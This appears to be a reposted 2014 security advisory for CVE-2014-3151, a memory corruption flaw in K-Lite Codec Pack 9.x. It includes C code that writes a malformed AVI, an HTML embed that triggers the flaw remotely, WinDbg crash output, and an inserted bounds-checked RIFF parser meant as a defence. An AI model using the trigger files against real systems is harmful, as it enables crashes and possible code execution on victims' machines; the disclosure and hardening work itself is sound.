K-Lite CODEC 9.x Memory Corruption
Source: vfocus.net  Author: Aryan  Published: 2014-05-06
# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]
# Date: [2014/05/3]
# Author: [Aryan Bayaninejad]
# LinkedIn: https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.codecguide.com]
# Software Link: [http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]
# Version: [version 9.x and prior]
# Tested on: [Windows XP SP3 32-bit and 64-bit, Windows 7 32-bit and 64-bit]
# CVE : [CVE-2014-3151]
# Found by Piece Dumb Fuzzer

Details:

K-Lite Codec Pack version 9.x and prior is vulnerable to a memory corruption
vulnerability that allows remote attackers to execute arbitrary code and take
control of the affected system via a malformed AVI file.

Tested with the latest edition of Windows Media Player, Internet Explorer, GOM
Player and KM Player, on Windows XP and Windows 7 (x64 and x86).

--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger memory corruption:

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* 154-byte malformed AVI: a RIFF/'AVI ' header and a LIST/'INFO' chunk whose
 * declared sizes far exceed the file, followed by a '--->' sub-chunk with
 * size 0xFFFFFFFC and a run of 0x41 bytes. */
unsigned char sc[154] =
{
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, 0x4C, 0x49, 0x53, 0x54,
    0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
};

int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;

    /* CreateFileA: the path is a narrow string, so this also builds with UNICODE defined. */
    fileHandle = CreateFileA("d:\\poc.AVI", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if (fileHandle == INVALID_HANDLE_VALUE)
    {
        printf("(-) Failed to create file\n");
        return 1;
    }
    printf("(+) Writing file ...\n");
    if (!WriteFile(fileHandle, sc, sizeof(sc), &dwBytesWritten, NULL) || dwBytesWritten != sizeof(sc))
    {
        printf("(-) Write failed\n");
        CloseHandle(fileHandle);
        return 1;
    }
    CloseHandle(fileHandle);
    return 0;
}
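As an added example (not part of the advisory and not code from the K-Lite Codec Pack or its splitters), the following C program walks the RIFF chunk tree of the PoC bytes above the way a hardened splitter should: every chunk size field is checked against the bytes that actually remain before it is used for indexing, and a claim that exceeds the buffer is counted and clamped rather than trusted. On the advisory's 154 bytes it reports three oversized size fields (the RIFF header, the LIST chunk, and the '--->' sub-chunk whose length is 0xFFFFFFFC), while a short well-formed AVI passes. The function names, the riff_report struct and the well-formed sample file are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the advisory: a bounds-checked RIFF chunk walker.
 * Chunk sizes are never used before being compared with the bytes remaining. */

typedef struct {
    int chunks;      /* chunk headers parsed, including the RIFF header */
    int oversized;   /* size fields that claim more than the remaining bytes */
    uint32_t worst;  /* largest oversized claim seen */
} riff_report;

/* First 32 bytes of the advisory's PoC; the remaining 122 bytes are all 0x41. */
static const unsigned char poc_header[32] = {
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, /* "RIFF", 679492, "AVI " */
    0x4C, 0x49, 0x53, 0x54, 0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, /* "LIST", 64636, "INFO" */
    0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF                          /* "--->", 0xFFFFFFFC   */
};

/* Constructed well-formed file: RIFF(28) / LIST(16) INFO / ISFT(4) "test". */
static const unsigned char good_avi[36] = {
    'R','I','F','F', 28,0,0,0, 'A','V','I',' ',
    'L','I','S','T', 16,0,0,0, 'I','N','F','O',
    'I','S','F','T',  4,0,0,0, 't','e','s','t'
};

/* Rebuilds the 154-byte PoC into out; returns bytes written (0 if cap too small). */
size_t build_poc(unsigned char *out, size_t cap)
{
    if (cap < 154) return 0;
    memcpy(out, poc_header, sizeof poc_header);
    memset(out + sizeof poc_header, 0x41, 154 - sizeof poc_header);
    return 154;
}

static uint32_t rd_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walks chunks in buf[off, end). A size larger than the bytes left is recorded
 * and clamped, so the walk can continue without ever indexing past end. */
static void walk(const unsigned char *buf, size_t off, size_t end, int depth, riff_report *r)
{
    while (off + 8 <= end) {
        uint32_t size = rd_le32(buf + off + 4);
        size_t body = off + 8;
        size_t avail = end - body;
        r->chunks++;
        if (size > avail) {
            r->oversized++;
            if (size > r->worst) r->worst = size;
            size = (uint32_t)avail;          /* clamp: the field is not trusted */
        }
        if (depth < 8 && size >= 4 && memcmp(buf + off, "LIST", 4) == 0)
            walk(buf, body + 4, body + size, depth + 1, r);   /* skip the 4-byte list type */
        off = body + size + (size & 1);      /* chunks are padded to even length */
    }
}

/* Returns 0 for a well-formed file, 1 if any size field is oversized, -1 if not RIFF. */
int riff_check(const unsigned char *buf, size_t len, riff_report *r)
{
    memset(r, 0, sizeof *r);
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0) return -1;
    r->chunks = 1;
    uint32_t riff_size = rd_le32(buf + 4);
    if (riff_size > len - 8) { r->oversized++; r->worst = riff_size; }
    walk(buf, 12, len, 0, r);
    return r->oversized ? 1 : 0;
}

int main(void)
{
    unsigned char buf[154];
    riff_report r;
    size_t n = build_poc(buf, sizeof buf);
    int bad = riff_check(buf, n, &r);
    printf("PoC: %s, %d chunk headers, %d oversized size fields, largest claim 0x%08X\n",
           bad ? "MALFORMED" : "ok", r.chunks, r.oversized, (unsigned)r.worst);
    bad = riff_check(good_avi, sizeof good_avi, &r);
    printf("well-formed sample: %s, %d chunk headers, %d oversized size fields\n",
           bad ? "MALFORMED" : "ok", r.chunks, r.oversized);
    return 0;
}
```

The walker uses the real buffer length as the only trust boundary; declared sizes are validated against it and clamped, which is the check that turns a read through 0x41414141 into a rejected file.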


--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger the memory corruption remotely (embeds the AVI in a web page via the Windows Media Player plug-in):


<embed type="application/x-mplayer2" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
       name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false" autostart="false"
       height="330" width="360" loop="false" src="D:/PoC.avi" />



WinDbg output:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000   C:\Program Files\Windows Media Player\wmplayer.exe
ModLoad: 7c900000 7c9b2000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 7e410000 7e4a1000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000   C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 12950000 133b5000   C:\WINDOWS\system32\wmp.dll
ModLoad: 774e0000 7761e000   C:\WINDOWS\system32\ole32.dll
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 77120000 771ab000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 75a70000 75a91000   C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 7c9c0000 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 59a60000 59b01000   C:\WINDOWS\system32\dbghelp.dll
ModLoad: 13740000 13f1b000   C:\WINDOWS\system32\wmploc.dll
ModLoad: 74720000 7476c000   C:\WINDOWS\system32\MSCTF.dll
ModLoad: 00ba0000 00e65000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 755c0000 755ee000   C:\WINDOWS\system32\msctfime.ime
ModLoad: 4ec50000 4edf6000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 63380000 63434000   C:\WINDOWS\system32\jscript.dll
ModLoad: 7e720000 7e7d0000   C:\WINDOWS\system32\SXS.DLL
ModLoad: 0d780000 0d7be000   C:\Program Files\Windows Media Player\mpvis.dll
ModLoad: 63000000 630e6000   C:\WINDOWS\system32\WININET.dll
ModLoad: 01400000 01409000   C:\WINDOWS\system32\Normaliz.dll
ModLoad: 1a400000 1a532000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 5dca0000 5de88000   C:\WINDOWS\system32\iertutil.dll
ModLoad: 15110000 1536c000   C:\WINDOWS\system32\wmvcore.dll
ModLoad: 11c70000 11caa000   C:\WINDOWS\system32\WMASF.DLL
ModLoad: 76380000 76385000   C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 77690000 776b1000   C:\WINDOWS\system32\NTMARTA.DLL
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 0bef0000 0bf27000   C:\WINDOWS\system32\MFPlat.DLL
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 77a80000 77b15000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 61da0000 61db0000   C:\WINDOWS\system32\mcicda.dll
ModLoad: 0e510000 0e562000   C:\WINDOWS\system32\mswmdm.dll
ModLoad: 769c0000 76a74000   C:\WINDOWS\system32\USERENV.dll
ModLoad: 5b860000 5b8b6000   C:\WINDOWS\system32\netapi32.dll
ModLoad: 0dfb0000 0dfe9000   C:\WINDOWS\system32\mspmsp.dll
ModLoad: 07940000 0797b000   C:\WINDOWS\system32\cewmdm.dll
ModLoad: 11d10000 11d1d000   C:\WINDOWS\system32\wmdmps.dll
ModLoad: 62bf0000 62c22000   C:\WINDOWS\system32\upnphost.dll
ModLoad: 4d4f0000 4d549000   C:\WINDOWS\system32\WINHTTP.dll
ModLoad: 74f00000 74f0c000   C:\WINDOWS\system32\SSDPAPI.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 13fe0000 14014000   C:\Program Files\Windows Media Player\wmpnssci.dll
ModLoad: 109c0000 109ec000   C:\WINDOWS\system32\PortableDeviceTypes.dll
ModLoad: 10930000 10979000   C:\WINDOWS\system32\PortableDeviceApi.dll
ModLoad: 0e020000 0e089000   C:\WINDOWS\system32\MSSCP.dll
ModLoad: 75cf0000 75d81000   C:\WINDOWS\system32\mlang.dll
ModLoad: 08b70000 08c65000   C:\WINDOWS\system32\drmv2clt.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 77c70000 77c94000   C:\WINDOWS\system32\msv1_0.dll
ModLoad: 722b0000 722b5000   C:\WINDOWS\system32\sensapi.dll
ModLoad: 14030000 14054000   C:\WINDOWS\system32\wmpps.dll
ModLoad: 71a50000 71a8f000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 10000000 10008000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\appHelp.dll
ModLoad: 5cb00000 5cb6e000   C:\WINDOWS\system32\shimgvw.dll
ModLoad: 38a70000 38a7c000   C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
ModLoad: 78130000 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 74810000 7497d000   C:\WINDOWS\system32\quartz.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 02f30000 02f9e000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000   C:\Program Files\K-Lite Codec Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000   C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000   C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000   C:\Program Files\Common Files\Roxio Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000   C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39            mov     edi,dword ptr [ecx]  ds:0023:41414141=????????

 